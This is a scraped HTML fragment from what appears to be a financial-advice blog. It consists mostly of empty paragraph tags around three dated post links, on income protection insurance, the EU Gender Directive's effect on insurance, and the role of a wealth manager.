</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n							</li>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n														</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<li>&#13;\n<br />\n<br />\n<br />\n<br />\n<br />\n<br />\n<br />\n<div class=\"post-holder\"><p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div class=\"meta\">&#13;\n										September 10th, 2017									</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n								</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n							</li>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n														</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<li>&#13;\n<br />\n<br />\n<br />\n<br />\n<br />\n<br />\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n																</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div class=\"post-holder\"><p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div class=\"meta\">&#13;\n										September 18th, 2017									</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n								</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n							</li>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n														</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<li>&#13;\n<br />\n<br />\n<br />\n<br />\n<br />\n<br />\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n																</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div class=\"post-holder\"><p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div class=\"meta\">&#13;\n										September 5th, 2017									</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n								</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n							</li>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n													